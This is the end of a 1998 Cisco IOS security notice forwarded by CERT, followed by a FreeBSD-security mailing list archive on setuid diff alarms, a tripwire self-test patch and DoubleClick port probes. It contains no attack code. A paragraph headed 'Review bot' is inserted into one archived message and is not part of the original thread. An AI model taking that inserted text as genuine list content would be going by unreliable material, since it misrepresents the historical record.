If all interfaces in the router are DFS-capable, but DFS has for some reason been enabled only on some of the interfaces, it may be possible to work around CSCdk35564 by enabling DFS on all interfaces. This will not affect CSCdk43862.

CSCdk43862 can sometimes be worked around by reconfiguring to use the same output access list on all the subinterfaces of a physical interface. Another possible workaround is to redesign the access list structure on the router to avoid the need for output access lists on affected interfaces.

Software Versions and Fixes
===========================

CSCdk43862 has a duplicate report, CSCdk43696. The bug ID CSCdk43862 should be used to refer to this defect.

The following table summarizes the affected Cisco IOS software versions for both CSCdk35564 and CSCdk43862, and indicates which versions have been fixed. To use the table, look up the software release you're currently running (available from the "show version" command on your router) in the first column of the table. The other columns of the table tell you which Cisco IOS software versions from your major release have been fixed, and which versions Cisco recommends you install.

The table lists both interim versions and regular released versions. Interim versions receive far less testing, and are generally of less certain quality, than regular released versions. Cisco recommends installing regular released software whenever possible.
Interim versions are listed for reference, and for the convenience of customers who must upgrade before appropriate regular released versions are available.

As always, a fix applied to one regular released version in a major release means that all later versions of that major release are also fixed. For instance, 11.2(17) is fixed, so 11.2(18) and later are also fixed.

The table is designed to cover all supported software on all affected Cisco routers. If you are running distributed fast switching on a 72xx router, a 75xx router, or a 70xx router with an RSP processor, and you are using an 11.1, 11.2, or 11.3 release not listed in the table, please contact the Cisco TAC for assistance.

Cisco IOS major release         | CSCdk35564   | CSCdk35564              | CSCdk43862   | CSCdk43862                   | Upgrade path for
(7xxx releases only)            | interim fix  | regular fix             | interim fix  | regular fix                  | 7xxx DFS users
--------------------------------+--------------+-------------------------+--------------+------------------------------+-------------------------------
11.0 and earlier, all variants  | Unaffected   | Unaffected              | Unaffected   | Unaffected                   | Unaffected
11.1                            | Unaffected   | Unaffected              | -            | -                            | Go to 11.1CA
11.1CA (core ED)                | Unaffected   | Unaffected              | 11.1(22)CA   | 11.1(22)CA                   | 11.1(22)CA or later
11.1CC (CEF ED)                 | 11.1(21.2)CC | 11.1(21)CC1, 11.1(22)CC | 11.1(21.2)CC | 11.1(21)CC1, 11.1(22)CC      | 11.1(21)CC1, 11.1(22)CC or later
11.1CT (tag switch ED)          | 11.1(21.2)CT | 11.1(22)CT              | 11.1(21.2)CT | 11.1(22)CT                   | 11.1(22)CT or later
11.2                            | Unaffected   | Unaffected              | 11.2(16.1)   | 11.2(17), planned Jan-1999   | 11.2(17) or later; 11.2(16.1) or 11.3 if 11.2(17) schedule unacceptable
11.2F                           | Unaffected   | Unaffected              | -            | -                            | Go to 11.3
11.2P (platform ED)             | Unaffected   | Unaffected              | 11.2(16.1)P  | 11.2(17)P, planned Jan-1999  | 11.2(17)P or later; 11.2(16.1)P or 11.3 if 11.2(17)P schedule unacceptable
11.2BC (CIP ED)                 | Unaffected   | Unaffected              | 11.2(16.1)BC | 11.2(17)BC, planned Jan-1999 | 11.2(17)BC or later; 11.2(16.1)BC if 11.2(17)BC schedule unacceptable
11.3                            | Unaffected   | Unaffected              | 11.3(6.2)    | 11.3(7), planned Nov-1998    | 11.3(7) or later
11.3T                           | Unaffected   | Unaffected              | 11.3(6.2)T   | 11.3(7)T, planned Nov-1998   | 11.3(7)T or later
11.3NA (voice ED)               | Unaffected   | Unaffected              | 11.3(6.2)NA  | 11.3(7)NA, planned Dec-1998  | 11.3(7)NA or later; 11.3(6.2)NA if 11.3(7)NA schedule unacceptable
11.3(2)XA                       | Unaffected   | Unaffected              | -            | -                            | 11.3(7) or later
12.0(1) and later, all variants | Unaffected   | Unaffected              | Unaffected   | Unaffected                   | Unaffected

Interim fixes: minimal testing; urgent upgrades only. Regular fixes: dates are subject to change.

Because of restricted port adapter support, Cisco does not believe that many, if any, customers are using DFS with 11.1 mainline software. 11.1CA is recommended for both functionality and stability reasons.

The 11.1(21)CC1 release is a special release of 11.1CC; the 11.1CC release sequence runs from 11.1(21)CC through 11.1(21)CC1, then to 11.1(22)CC.

11.3(2)XA was a special one-time release based on 11.3(2). The functionality of 11.3(2)XA was carried into the 11.3(3) release.

Getting Fixed Software
----------------------

Cisco is offering free software updates to correct these defects for all vulnerable customers, regardless of contract status. As with any software change, you should check to make sure that your hardware can support the new software before installing it. The most common problem is inadequate RAM. While this is seldom a problem when upgrading within a major release (say, from 11.2(11)P to 11.2(17)P), it is often an issue when upgrading between major releases (say, from 11.2(11)P to 11.3(7)T). Further assistance is available on Cisco's Worldwide Web site at http://www.cisco.com.

Customers with service contracts should obtain new software through their regular update channels (generally via Cisco's Worldwide Web site). Customers with service contracts may upgrade to any software release, but must, as always, remain within the boundaries of the feature sets they have purchased. Cisco does not recommend upgrading to a new major release without careful planning.

Customers without service contracts may upgrade only to obtain the bug fixes; they are not offered upgrades to versions newer than required to resolve the defects.
In general, customers without service contracts will be restricted to upgrading within a single row of the table above. Customers without service contracts should get their updates by contacting the Cisco TAC. TAC contacts are as follows:

  * +1 800 553 2447 (toll-free from within North America)
  * +1 408 526 7209 (toll call from anywhere in the world)
  * tac@cisco.com

Give the URL of this notice as evidence of your entitlement to a free update. Free updates for non-contract customers must be requested through the TAC. Please do not contact either "psirt@cisco.com" or "security-alert@cisco.com" for software updates.

Exploitation and Public Announcements
=====================================

Cisco knows of no public announcements or discussion of these vulnerabilities prior to the date of this notice. CSCdk35564 was found by a Cisco customer during installed-system testing. CSCdk43862 was found by Cisco during internal testing.

Because of the nature of these vulnerabilities, attackers would rarely be expected to exploit them directly. In most cases, attackers would simply find themselves with access to network resources to which administrators thought they had denied access. Cisco has had no actual reports of malicious attacks succeeding because of this vulnerability, nor of anyone deliberately trying to create "vulnerable" conditions.

Status of This Notice
=====================

This is a final field notice. Although Cisco cannot guarantee the accuracy of all statements in this notice, all the facts have been checked to the best of our ability. Cisco does not anticipate issuing updated versions of this notice unless there is some material change in the facts. Should there be a significant change in the facts, Cisco may update this notice.

Distribution
------------

This notice will be posted on Cisco's Worldwide Web site at http://www.cisco.com/warp/public/770/iosdfsacl-pub.shtml .
In addition to Worldwide Web posting, the initial version of this notice is being sent to the following e-mail and Usenet news recipients:

  * cust-security-announce@cisco.com
  * bugtraq@netspace.org
  * first-teams@first.org (includes CERT/CC)
  * first-info@first.org
  * cisco@spot.colorado.edu
  * comp.dcom.sys.cisco
  * nanog@merit.edu
  * Various internal Cisco mailing lists

Future updates of this notice, if any, will be placed on Cisco's Worldwide Web server, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the URL given above for any updates.

Revision History
----------------

Revision 1.0, 00:12 US/Pacific, 2-NOV-1998: First public release candidate version.
Revision 1.1, 20:08 US/Pacific, 2-NOV-1998: Cosmetic edits.
Revision 1.2, 08:55 US/Pacific, 3-NOV-1998: More cosmetic edits.

Cisco Security Procedures
=========================

Please report security issues with Cisco products, and/or sensitive security intrusion emergencies involving Cisco products, to security-alert@cisco.com . Reports may be encrypted using PGP; public RSA and DSS keys for "security-alert@cisco.com" are on the public PGP keyservers.

The alias "security-alert@cisco.com" is used only for reports incoming to Cisco. Mail sent to the list goes only to a very small group of users within Cisco. Neither outside users nor unauthorized Cisco employees may subscribe to "security-alert@cisco.com".

Please do not use "security-alert@cisco.com" for configuration questions, for security intrusions that you do not consider to be sensitive emergencies, or for general, non-security-related support requests. We do not have the capacity to handle such requests through this channel, and will refer them to the TAC, delaying response to your questions. We advise contacting the TAC directly with these requests.
TAC contact numbers are as follows:

  * +1 800 553 2447 (toll-free from within North America)
  * +1 408 526 7209 (toll call from anywhere in the world)
  * tac@cisco.com

All formal public security notices generated by Cisco are sent to the public mailing list "cust-security-announce@cisco.com". For information on subscribing to this mailing list, send a message containing the single line "info cust-security-announce" to "majordomo@cisco.com". An analogous list, "cust-security-discuss@cisco.com", is available for public discussion of the notices and of other Cisco security issues.

Press contacts
--------------

Press inquiries regarding Cisco security notices should be directed to Doug Wills, dwills@cisco.com, +1 408 527 9475.

=================================================================
This notice is copyright 1998 by Cisco Systems, Inc. This notice may be redistributed freely after the release date given at the top of the text, provided that redistributed copies are complete and unmodified, including this copyright notice and all date and version information.
=================================================================

========================FORWARDED TEXT ENDS HERE=============================

If you believe that your system has been compromised, contact the CERT Coordination Center or your representative in the Forum of Incident Response and Security Teams (FIRST). See http://www.first.org/team-info/.
We strongly urge you to encrypt any sensitive information you send by email. The CERT Coordination Center can support a shared DES key and PGP. Contact the CERT staff for more information.

Location of CERT PGP key: ftp://ftp.cert.org/pub/CERT_PGP.key

CERT Contact Information
------------------------

Email:  cert@cert.org
Phone:  +1 412-268-7090 (24-hour hotline)
        CERT personnel answer 8:30-5:00 p.m. EST (GMT-5)/EDT(GMT-4), and are on call for emergencies during other hours.
Fax:    +1 412-268-6989

Postal address:
        CERT Coordination Center
        Software Engineering Institute
        Carnegie Mellon University
        Pittsburgh PA 15213-3890
        USA

CERT publications, information about FIRST representatives, and other security-related information are available from

        http://www.cert.org/
        ftp://ftp.cert.org/pub/

CERT advisories and bulletins are also posted on the USENET newsgroup comp.security.announce

To be added to our mailing list for CERT advisories and bulletins, send your email address to cert-advisory-request@cert.org . In the subject line, type SUBSCRIBE your-email-address

==========================================================================
* Registered U.S. Patent and Trademark Office.

The CERT Coordination Center is part of the Software Engineering Institute (SEI). The SEI is sponsored by the U. S. Department of Defense.

NO WARRANTY

ANY MATERIAL FURNISHED BY CARNEGIE MELLON UNIVERSITY AND THE SOFTWARE ENGINEERING INSTITUTE IS FURNISHED ON AN "AS IS" BASIS. CARNEGIE MELLON UNIVERSITY MAKES NO WARRANTIES OF ANY KIND, EITHER EXPRESSED OR IMPLIED AS TO ANY MATTER INCLUDING, BUT NOT LIMITED TO, WARRANTY OF FITNESS FOR A PARTICULAR PURPOSE OR MERCHANTABILITY, EXCLUSIVITY OR RESULTS OBTAINED FROM USE OF THE MATERIAL. CARNEGIE MELLON UNIVERSITY DOES NOT MAKE ANY WARRANTY OF ANY KIND WITH RESPECT TO FREEDOM FROM PATENT, TRADEMARK, OR COPYRIGHT INFRINGEMENT.
==========================================================================

This file: ftp://ftp.cert.org/pub/cert_bulletins/VB-98.13.Cisco_IOS_DFS

From owner-freebsd-security Fri Nov 6 07:34:55 1998
Date: Fri, 06 Nov 1998 16:34:38 +0100
To: mwlucas@exceptionet.com, freebsd-security@FreeBSD.ORG
From: Marius Bendiksen
Subject: Re: *huge* setuid diffs
In-Reply-To: <199811061258.HAA22049@easeway.com>

I'm no expert, but I'd indeed be worried.

---
Marius Bendiksen, IT-Trainee, ScanCall AS

From owner-freebsd-security Fri Nov 6 08:23:04 1998
Date: Fri, 06 Nov 1998 09:21:03 -0700
To: tarkhil@synchroline.ru, mwlucas@exceptionet.com
From: Brett Glass
Subject: Re: *huge* setuid diffs
Cc: freebsd-security@FreeBSD.ORG
In-Reply-To: <199811061419.RAA01848@enterprise.sl.ru>

This might be a breakin, but it also might be due to the VM bug that changes file mod dates. (We went to red alert over that one before we found out about it.) This bug shouldn't be allowed to persist, as it causes problems with tripwire, etc.

--Brett

At 05:19 PM 11/6/98 +0300, Alexander B. Povolotsky wrote:
> <199811061258.HAA22049@easeway.com> mwlucas@exceptionet.com writes:
>> I just got /etc/security mail from two 2.2.6 servers I administer. The
>> setuid diffs list every setuid program on the server as having been removed
>> and replaced.
>>
>> We haven't done a make world. We haven't touched much of anything.
>>
>> Is this normal, or should I be worried?
> *IMMEDIATELY* shut down both servers and do not bring them to the Internet until
> you've found the reason.
>
> It is *QUITE* abnormal. I would not call it "exploit", but it is something to
> understand at once.
>
> Alex.
>
> --
> Alexander B. Povolotsky, System Administrator

From owner-freebsd-security Fri Nov 6 08:51:57 1998
From: mhpower@mit.edu
Date: Fri, 6 Nov 1998 11:51:29 -0500
To: root@wagsky.com
Cc: fpscha@ns1.sminter.com.ar, freebsd-security@FreeBSD.ORG
Subject: Re: tripwire fails 'make test'

> ... tripwire fails to properly execute its own testing (under either multi- or single-user mode). Is this indicative of a problem which needs to be resolved? ...
> === test.update.sh: testing CHANGED files ===
> === test.update.sh: test FAILED! (expecting 8, got 0) ===

I sent the tripwire authors a bug report and a patch for what I suspect is this same problem in (I think) 1996, and got a response indicating that they didn't wish to issue a new release to fix it.

What I think is going on is that test.update.sh expects that at least one second will pass in between recording the mtime of a file, and the checking of the mtime of that file after a "touch" is done. On fast machines/disks, less than a second passes, and thus tripwire reports an error since it thinks it failed to detect an mtime change.

The simplest workaround may be to insert a sleep statement prior to when the file is touched. I've included an untested patch below that uses this approach. If there's any interest, I can go find the longer explanation that I wrote up at the time, as well as the patch that I submitted (which was looked over by Gene Kim and Gene Spafford, who didn't object to it but yet haven't made any changes to the distribution at ftp://coast.cs.purdue.edu/pub/Purdue/Tripwire/tripwire-1.2.tar.Z).

Matt

*** test.update.sh.old Tue Feb 22 02:46:22 1994 --- test.update.sh Fri Nov 6 11:37:15 1998 *************** *** 169,174 **** --- 169,175 ---- ( . $MYRUN ; ) > $LOGFILE ; set _ $STATUSDEL; shift . 
$MYCHECK + sleep 2 touch $OLDFILE echo "=== $ME: testing CHANGED files ===" 
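Review bot: the added `+ sleep 2` line carries no explanation of why the delay is needed; add a comment above it stating that the test assumes the recorded mtime and the mtime after `touch $OLDFILE` fall in different seconds, which is the timing assumption the message describes failing on fast machines. Without that comment the next reader will see an arbitrary sleep and may remove it, bringing back the "expecting 8, got 0" failure. The message also calls the patch untested, so it should be run once on a machine where the failure reproduced before it is adopted.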
From owner-freebsd-security Fri Nov 6 09:06:00 1998
From: Jasper O'Malley
Date: Fri, 6 Nov 1998 11:13:36 -0600 (CST)
To: security@FreeBSD.ORG
Subject: Re: *huge* setuid diffs
In-Reply-To: <199811061419.RAA01848@enterprise.sl.ru>

> I just got /etc/security mail from two 2.2.6 servers I administer. The
> setuid diffs list every setuid program on the server as having been
> removed and replaced.
>
> We haven't done a make world. We haven't touched much of anything.
>
> Is this normal, or should I be worried?

My guess is that the files just got old enough so that the ls -l "last modified" information shows the year instead of the time, which is reflected in the diff between /var/log/setuid.today and /var/log/setuid.yesterday (which is what shows up in the mail /etc/security sends to you). Freaked me out the first time it happened to me, too. If that's indeed what's happened, it's completely harmless.

Cheers,
Mick

The Reverend Jasper P. O'Malley, Systems Administrator, Webnology, LLC
jooji@webnology.com, http://www.webnology.com/~jooji

From owner-freebsd-security Fri Nov 6 09:07:58 1998
Date: Fri, 6 Nov 1998 09:10:30 -0800
From: Sean Harding
To: Alexander B. Povolotsky
Cc: mwlucas@exceptionet.com, freebsd-security@FreeBSD.ORG
Subject: Re: *huge* setuid diffs
In-Reply-To: <199811061419.RAA01848@enterprise.sl.ru>

On Fri, 6 Nov 1998, Alexander B. Povolotsky wrote:
> *IMMEDIATELY* shut down both servers and do not bring them to the Internet until
> you've found the reason.

Actually, I recommend pulling it off the network, but not shutting it down. If you have had an intrusion, shutting it down will destroy much of the evidence (running processes, etc). You'll have a much harder time determining what has been done.

sean

--
Sean Harding, sharding@oregon.uoregon.edu, http://gladstone.uoregon.edu/~sharding/
Consulting: http://www.efn.org/~seanh/
"Remember how it all began / The apple and the fall of man" --Natalie Merchant

From owner-freebsd-security Fri Nov 6 09:10:54 1998
id m0zbp8t-00000zC; Fri, 6 Nov 98 11:53 EST Message-Id: 
From: erics@now.com (Eric Siegerman) Subject: Re: *huge* setuid diffs To: tarkhil@synchroline.ru Date: Fri, 6 Nov 1998 11:53:47 -0500 Cc: mwlucas@exceptionet.com, freebsd-security@FreeBSD.ORG In-Reply-To: <199811061419.RAA01848@enterprise.sl.ru> from "Alexander B. Povolotsky" at Nov 6, 98 09:19:13 am X-Mailer: ELM [version 2.4 PL25] Content-Type: text/plain; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Alexander B. Povolotsky wrote: > > <199811061258.HAA22049@easeway.com>mwlucas@exceptionet.com writes: > >I just got /etc/security mail from two 2.2.6 servers I administer. The > >setuid diffs list every setuid program on the server as having been removed > >and replaced. One possibility is that *one* file's size changed by enough to add or subtract a digit, which caused the two "ls -l" outputs to have different spacing. A simple "diff" would report all the lines as having changed. At some point, /etc/security got smart enough to ignore such spurious differences. But I can't recall whether this had happened by 2.2.6. > It is *QUITE* abnormal. I would not call it "exploit", but it is something to > understand at once. It may or may not be abnormal, and it's more or less likely to be an intrusion -- both depending on your OS version; see above. But it's absolutely "something to understand at once"! -- | | /\ |-_|/ > Eric Siegerman, Toronto, Ont. 
erics@now.com | | / The Rock & Roll Baby Theorem: Syllables(x+"baby") = Syllables("baby"+x) = Syllables(x) + 2 SemanticContent(x+"baby") = SemanticContent("baby"+x) = SemanticContent(x) - Anonymous To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 6 10:52:58 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA12359 for freebsd-security-outgoing; Fri, 6 Nov 1998 10:52:58 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from carp.gbr.epa.gov (carp.gbr.epa.gov [204.46.159.110]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA12341 for ; Fri, 6 Nov 1998 10:52:56 -0800 (PST) (envelope-from mjenkins@carp.gbr.epa.gov) Received: (from mjenkins@localhost) by carp.gbr.epa.gov (8.8.8/8.8.8) id MAA27444; Fri, 6 Nov 1998 12:52:22 -0600 (CST) (envelope-from mjenkins) Date: Fri, 6 Nov 1998 12:52:22 -0600 (CST) 
From: Mike Jenkins Message-Id: <199811061852.MAA27444@carp.gbr.epa.gov> To: mhpower@mit.edu, root@wagsky.com Subject: Re: tripwire fails 'make test' Cc: fpscha@ns1.sminter.com.ar, freebsd-security@FreeBSD.ORG In-Reply-To: <199811061651.AA26461@stan.mit.edu> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is one of the comp.security.unix/comp.security.misc FAQs. See http://www.cis.ohio-state.edu/hypertext/faq/usenet/computer-security/most-common-qs/faq.html, "Tripwire fails the self-test", which references ftp://coast.cs.purdue.edu/pub/COAST/Tripwire/README-third. Mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 6 10:59:06 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA13010 for freebsd-security-outgoing; Fri, 6 Nov 1998 10:59:06 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA13005 for ; Fri, 6 Nov 1998 10:59:04 -0800 (PST) (envelope-from brett@lariat.org) Received: (from brett@localhost) by lariat.lariat.org (8.8.8/8.8.6) id LAA11661; Fri, 6 Nov 1998 11:57:23 -0700 (MST) Message-Id: <4.1.19981106115353.04ca84a0@127.0.0.1> X-Sender: brett@127.0.0.1 X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1 Date: Fri, 06 Nov 1998 11:55:19 -0700 To: Sean Harding , "Alexander B. Povolotsky" 
From: Brett Glass Subject: Re: *huge* setuid diffs Cc: mwlucas@exceptionet.com, freebsd-security@FreeBSD.ORG In-Reply-To: References: <199811061419.RAA01848@enterprise.sl.ru> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org That's good advice, especially if the intruder has killed syslogd. --Brett At 09:10 AM 11/6/98 -0800, Sean Harding wrote: >On Fri, 6 Nov 1998, Alexander B. Povolotsky wrote: > >> *IMMEDIATLY* shut down both server and do not bring them to Internet until >> you'll found the reason. > >Actually, I recommend pulling it off the network, but not shutting it >down. If you have had an intrusion, shutting it down will destroy much of >the evidence (running processes, etc). You'll have a much harder time >determining what has been done. > >sean > >-- >Sean Harding sharding@oregon.uoregon.edu|"Remember how it all began >http://gladstone.uoregon.edu/~sharding/ | The apple and the fall of man" >Consulting: http://www.efn.org/~seanh/ | --Natalie Merchant > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 6 18:26:23 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id SAA10315 for freebsd-security-outgoing; Fri, 6 Nov 1998 18:26:23 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from easeway.com (ns1.easeway.com [209.69.71.100]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id SAA10299 for ; Fri, 6 Nov 1998 18:26:19 -0800 (PST) (envelope-from mwlucas@easeway.com) Received: (from mwlucas@localhost) by easeway.com (8.8.8/8.8.5) id VAA00825; Fri, 6 Nov 1998 21:10:52 -0500 (EST) Message-Id: <199811070210.VAA00825@easeway.com> Subject: Re: *huge* setuid diffs In-Reply-To: 
<4.1.19981106091836.04eb61b0@127.0.0.1> from Brett Glass at "Nov 6, 98 09:21:03 am" To: brett@lariat.org (Brett Glass), freebsd-security@FreeBSD.ORG Date: Fri, 6 Nov 1998 21:10:52 -0500 (EST) 
From: mwlucas@exceptionet.com X-Mailer: ELM [version 2.4ME+ PL32 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > This might be a breakin, but it also might be due to the VM > bug that changes file mod dates. (We went to red alert > over that one before we found out about it.) Upon careful checking, it seems that someone (a known someone, not an intruder) reset the clock and timezone on these machines. The diff is in the timestamp, i.e.: server~;grep df suidmessage < -r-xr-sr-x 1 bin operator 53248 Mar 25 01:51:04 1998 /bin/df > -r-xr-sr-x 1 bin operator 53248 Mar 24 20:51:04 1998 /bin/df This matches symptoms in the mail archives (now that I'm searching for "vm bug" and not "setuid diffs" :) My apologies for dumping this to the list right away: one of the servers in question handles credit card numbers, and the last thing I needed was a hack. Big thanks to everyone who responded! ==ml -- Michael Lucas | Exceptionet, Inc. | www.exceptionet.com "Exceptional Networking" | To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Nov 7 01:24:40 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA12537 for freebsd-security-outgoing; Sat, 7 Nov 1998 01:24:40 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.aussie.org (hallam.lnk.telstra.net [139.130.54.166]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA12530 for ; Sat, 7 Nov 1998 01:24:35 -0800 (PST) (envelope-from mlnn4@oaks.com.au) Received: from bigbox (dialup-b1-29.raytrace.com [203.29.75.73]) by mail.aussie.org (8.9.0/8.9.0) with SMTP id UAA01040 for ; Sat, 7 Nov 1998 20:24:21 +1100 (EST) Message-Id: <199811070924.UAA01040@mail.aussie.org> 
From: "Hallam Oaks" To: "FreeBSD Security" Date: Sat, 07 Nov 1998 20:25:15 +1100 Reply-To: "Hallam Oaks" X-Mailer: PMMail 98 Standard (2.01.1600) For Windows NT (4.0.1381;3) MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Subject: hmmmm ... Doubleclick Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Now I wonder why Doubleclick would do this ... Just a few minutes ago I visited a site which had a doubleclick ad on it, and my IPFW monitoring tool almost immediately started chirping at me. A quick look showed that two seperate IP addresses had attempted to make TCP connections to port 53 (DNS) of the machine that hosts my proxy. That IP address does NOT host any DNS server. The two IP addresses in question were 209.67.38.88 and 199.95.207.220, both of which resolve to Doubleclick (nygda1 and exgd1a.doubleclick.net). Now, I'm not suggesting that doubleclick are doing anything they shouldn't here, but I'm still curious as to why they would attempt to make a TCP connection to a non-existant DNS server, based purely on the IP address of someone who's viewed one of their ads (it was at the Dilbert zone BTW). Anyone seen this before ? 
-- Chris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Nov 7 01:54:34 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA15783 for freebsd-security-outgoing; Sat, 7 Nov 1998 01:54:34 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from adelphi.physics.adelaide.edu.au (adelphi.physics.adelaide.edu.au [129.127.36.247]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA15778 for ; Sat, 7 Nov 1998 01:54:32 -0800 (PST) (envelope-from kkennawa@physics.adelaide.edu.au) Received: from majorana.physics.adelaide.edu.au (majorana [129.127.26.185]) by adelphi.physics.adelaide.edu.au (8.8.8/8.8.8/UofA-1.5) with SMTP id UAA01213; Sat, 7 Nov 1998 20:24:14 +1030 (CST) Received: from localhost by majorana.physics.adelaide.edu.au (5.65v4.0/1.1.19.2/19Oct98-0252AM) id AA09631; Sat, 7 Nov 1998 04:54:14 -0500 Date: Sat, 7 Nov 1998 04:54:14 -0500 (EST) 
From: Kris Kennaway To: Hallam Oaks Cc: FreeBSD Security Subject: Re: hmmmm ... Doubleclick In-Reply-To: <199811070924.UAA01040@mail.aussie.org> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, 7 Nov 1998, Hallam Oaks wrote: > connection to a non-existant DNS server, based purely on the IP address of > someone who's viewed one of their ads (it was at the Dilbert zone BTW). Dunno the reason, but I used to see this from the Dilbert webpage also. It stopped after a week or so and I havent seen it in quite a while, so I havent followed it up with them. Kris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Nov 7 03:42:24 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id DAA22555 for freebsd-security-outgoing; Sat, 7 Nov 1998 03:42:24 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from smtp2.globalserve.net (smtp2.globalserve.net [209.90.128.7]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id DAA22544 for ; Sat, 7 Nov 1998 03:42:18 -0800 (PST) (envelope-from geoffr@globalserve.net) Received: from globalserve.net (dialin847.toronto.globalserve.net [209.90.133.84]) by smtp2.globalserve.net (8.9.1/8.9.1) with ESMTP id GAA02436; Sat, 7 Nov 1998 06:43:48 -0500 (EST) Message-ID: <3643AE14.22C49D7C@globalserve.net> Date: Fri, 06 Nov 1998 21:19:00 -0500 
From: Geoffrey Robinson X-Mailer: Mozilla 4.03 [en] (Win95; U) MIME-Version: 1.0 To: Hallam Oaks CC: security@FreeBSD.ORG Subject: Re: hmmmm ... Doubleclick References: <199811070924.UAA01040@mail.aussie.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hallam Oaks wrote: > > Now I wonder why Doubleclick would do this ... > > Just a few minutes ago I visited a site which had a doubleclick ad on it, > and my IPFW monitoring tool almost immediately started chirping at me. A > quick look showed that two seperate IP addresses had attempted to make TCP > connections to port 53 (DNS) of the machine that hosts my proxy. That IP > address does NOT host any DNS server. > > The two IP addresses in question were 209.67.38.88 and 199.95.207.220, both > of which resolve to Doubleclick (nygda1 and exgd1a.doubleclick.net). > > Now, I'm not suggesting that doubleclick are doing anything they shouldn't > here, but I'm still curious as to why they would attempt to make a TCP > connection to a non-existant DNS server, based purely on the IP address of > someone who's viewed one of their ads (it was at the Dilbert zone BTW). > > Anyone seen this before ? Doubleclick can target banner ads by things like country, state, etc. The only way they can this is by maintaining a database of known ISP domains and the counties and states that the ISP services (for local dialup users). If you hit an ad and your hostname is not in the Doubleclick database their system will try to poll name servers and Internic to try and guess where you are. I don't know if that's what it was but it seems most likely. 
- Geoff To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Nov 7 09:15:23 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA16466 for freebsd-security-outgoing; Sat, 7 Nov 1998 09:15:23 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from uriela.in-berlin.de (servicia.in-berlin.de [192.109.42.145]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA16457 for ; Sat, 7 Nov 1998 09:15:18 -0800 (PST) (envelope-from nortobor.nostromo.in-berlin.de!ripley@servicia.in-berlin.de) Received: by uriela.in-berlin.de (Smail-3.2.0.101 1997-Dec-17 #1) id m0zcCxu-000VZuC; Sat, 7 Nov 1998 19:20:02 +0100 (CET) Received: (from ripley@localhost) by nortobor.nostromo.in-berlin.de (8.8.7/8.8.7) id XAA20628; Fri, 6 Nov 1998 23:09:30 +0100 (CET) (envelope-from ripley) Message-ID: <19981106230929.A20604@nostromo.in-berlin.de> Date: Fri, 6 Nov 1998 23:09:29 +0100 
